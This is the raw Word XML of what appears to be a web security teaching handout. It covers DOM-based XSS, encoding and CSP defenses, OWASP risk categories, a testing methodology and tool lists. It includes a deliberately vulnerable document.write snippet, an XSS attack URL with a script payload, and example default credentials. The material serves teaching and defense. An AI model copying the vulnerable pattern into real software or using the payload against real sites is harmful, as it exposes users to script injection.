    <w:p w14:paraId="0587ABD0" w14:textId="10CC96F3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Vulnerability in client-side JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7BFC5" w14:textId="13C7B588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Script manipulates DOM with untrusted data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4ACD4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No server involvement in exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435706B3" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1770D8D7" w14:textId="7CA8D804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Example Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A0C06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// Vulnerable code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FC2F0E" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">("&lt;h1&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hash.substring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(1) + "&lt;/h1&gt;"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36A5DCB7" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14112DE7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// Attack URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64289ECC" w14:textId="1FFB97C7" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="000360D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://site.com/page#&lt;script&gt;alert('XSS')&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D2CB64" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA0DE3D" w14:textId="33AA98E5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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32B852EC" wp14:editId="44575287">
            <wp:extent cx="5943600" cy="2544445"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="130587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75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BA47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XSS Protection Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B101016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1. Input Validation and Sanitization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7FE869" w14:textId="5D6BC3FB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Whitelist Approach: Allow only safe characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC04C2B" w14:textId="0A4A60D5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Encoding: Convert special characters to HTML entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C18FDC" w14:textId="62718D6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Context-Aware Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2320FC60" w14:textId="394A102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HTML: &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; for &lt;, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>; for &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D241CFC" w14:textId="695A149C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JavaScript: Unicode escapes \u003c for &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D78DDEB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URLs: Percent encoding %3C for &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E64947" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FCA3213" w14:textId="4839E8FF" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F7055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70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Output Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A576B85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// PHP example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D07C64C" w14:textId="36C4C0C8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echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>htmlspecialchars</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, ENT_QUOTES, 'UTF-8'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7384233B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAE884A" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57DD7A8B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD82A1B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1538E17E" w14:textId="66B31922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lastRenderedPageBreak/>
        <w:t>3. Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4C304" w14:textId="22D43835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HTTP header restricting resource loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A41AD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Prevents inline scripts and unauthorized sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C65FCA" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A55AF56" w14:textId="77777777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Example CSP Header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550A60C" w14:textId="556F51C0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Content-Security-Policy: default-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'self'; script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'self' </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000360D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://trusted.cdn.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12161734" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327A06EA" w14:textId="0B77E843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4. Secure Development Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F34F8" w14:textId="54765C7D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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Use Template Engines: Auto-escaping features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8441DC" w14:textId="7C37498A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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Avoid Dangerous Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0AD84" w14:textId="79924FCC" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD8907" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) with strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540EB6D8" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A13C017" w14:textId="3F0F120F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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HttpOnly Cookies: Prevent JavaScript access to session cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD138A" w14:textId="40350ADD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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Regular Security Testing: SAST, DAST, penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA35F29" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1886936B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5. Framework Protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565D3AF" w14:textId="5805DFAD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Modern frameworks (React, Angular, Vue) include XSS protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16204824" w14:textId="7462DDC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Use built-in data binding instead of manual DOM manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70D92D" w14:textId="6F7C37DC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Enable framework security features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45717C3F" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161D15A3" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB8AD4F" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>7. Additional Web Security Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DCF297" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDD9980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Broken Access Control (OWASP A01/A05)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DC86F1" w14:textId="22537960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Vertical Privilege Escalation: User accesses admin functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA10FB3" w14:textId="77642EA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Horizontal Privilege Escalation: User accesses another user's data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E4209D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Prevention: Role-based access control, proper authorization checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C41808" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADA9B16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Security Misconfiguration (OWASP A05/A06)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D0EA2" w14:textId="595E307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Default Credentials: Admin/admin, root/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C240679" w14:textId="0D75BB1E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Unnecessary Services: Open ports, debug endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35351905" w14:textId="789833BA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Verbose Error Messages: Information disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DB0D4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Prevention: Hardening guides, automated configuration checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154590F5" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D6B59C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Using Components with Known Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FDE38D" w14:textId="020571DE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Problem: Unpatched libraries/frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B35B35" w14:textId="25EDF88A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Solution: Regular dependency scanning, patch management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BECFD3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Tools: OWASP Dependency Check, Snyk, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WhiteSource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3437CE1C" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BEAD6C5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Insufficient Logging and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C172CA0" w14:textId="3564840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Missing: Failed login attempts, access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A7D6F2" w14:textId="6C29CC5E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Solution: Comprehensive logging, SIEM integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC4561" w14:textId="68EDF18E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Response: Incident detection and response procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09661EBF" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A94F197" w14:textId="77777777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lastRenderedPageBreak/>
        <w:t>8. Web Security Testing Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A394B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F04F437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Testing Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC07610" w14:textId="2315AE95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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D7915" w14:textId="0B0C4A4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Identify application entry points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF84079" w14:textId="718A4122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Map functionality and user roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C14E9" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3B67F0" w14:textId="143139EB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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vulnerability Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B033F" w14:textId="55FFE3A5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Automated scanning (OWASP ZAP, Burp Suite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADB650" w14:textId="54CD071C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Manual testing for logic flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144A950E" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742469E4" w14:textId="0D8722B1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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C233D2" w14:textId="2385674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Validate vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB10F6" w14:textId="4FD75792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Document impact and evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA5270" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FC6F7E" w14:textId="582BE9EF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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B70FC" w14:textId="337701BF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Risk assessment and prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A3BA1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Remediation recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE5F49" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FBDF24" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1310B591" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF584DB" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0849CA" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CA5E85" w14:textId="67F6B846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lastRenderedPageBreak/>
        <w:t>Essential Testing Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68EF12" w14:textId="31F959A5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Proxy Tools: Burp Suite, OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE224F" w14:textId="45F0E94E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Scanners: Nessus, Qualys, OpenVAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB3999" w14:textId="7C03CDF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Frameworks: Metasploit, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Browser Exploitation Framework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D9959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Browser Extensions: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HackBar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, Web Developer Toolbar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A09B0F" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24698357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9. Defense in Depth for Web Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE061DD" w14:textId="7C148F34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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Multiple Security Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79512E64" w14:textId="39010858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Network Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95120F" w14:textId="77A9F7CD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Firewalls, WAF (Web Application Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197CCC9F" w14:textId="4E945986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DDoS protection, rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E9791" w14:textId="51385EBF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F70556">
        <w:rPr>
          <w:sz w:val="28"/>
